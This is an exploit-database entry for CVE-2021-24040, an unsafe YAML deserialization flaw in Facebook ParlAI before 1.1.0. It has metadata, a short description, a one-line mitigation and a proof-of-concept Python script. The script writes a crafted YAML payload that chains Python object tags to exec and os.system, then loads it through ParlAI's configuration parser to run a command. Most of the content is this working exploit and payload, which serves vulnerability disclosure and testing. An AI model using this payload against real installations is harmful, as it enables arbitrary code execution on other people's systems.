header-logo
Suggest Exploit
vendor:
ParlAI
by:
Abhiram V
9,8
CVSS
CRITICAL
YAML deserialization attack
502
CWE
Product Name: ParlAI
Affected Version From: 1.0.0
Affected Version To: 1.1.0
Patch Exists: YES
Related CWE: CVE-2021-24040
CPE: a:facebook:parlai:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2021

Facebook ParlAI 1.0.0 – Deserialization of Untrusted Data in parlai

ParlAI was vulnerable to YAML deserialization attack caused by unsafe loading which leads to Arbitrary Code Execution. Create the following PoC file (exploit.py): import os; from parlai.chat_service.utils import config; exploit = """!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('xcalc')"""; open('config.yml','w+').write(exploit); config.parse_configuration_file('config.yml'); Execute the python script ie, python3 exploit.py

Mitigation:

Ensure that the YAML files are not loaded from untrusted sources and that the YAML files are validated before loading.
Source

Exploit-DB raw data:

# Exploit Title: Facebook ParlAI 1.0.0 -  Deserialization of Untrusted Data in parlai
# Date: 2021-09-11
# Exploit Author: Abhiram V
# Vendor Homepage: https://parl.ai/
# Software Link: https://github.com/facebookresearch/ParlAI
# Version: < 1.1.0
# Tested on: Linux
# CVE: CVE-2021-24040
# References : 
# https://github.com/facebookresearch/ParlAI/security/advisories/GHSA-m87f-9fvv-2mgg
# | https://anon-artist.github.io/blogs/blog3.html |

############################################################################

Introduction
ParlAI (pronounced “par-lay”) is a free, open-source python framework for
sharing, training and evaluating AI models on a variety of openly available
dialogue datasets.

############################################################################

Vulnerability details

############################################################################

Description
ParlAI was vulnerable to YAML deserialization attack caused by unsafe
loading which leads to Arbitrary Code Execution.

Proof of Concept

Create the following PoC file (exploit.py)

import os
#os.system('pip3 install parlai')
from parlai.chat_service.utils import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('config.yml','w+').write(exploit)
config.parse_configuration_file('config.yml')

Execute the python script ie, python3 exploit.py

Impact
Code Execution

############################################################################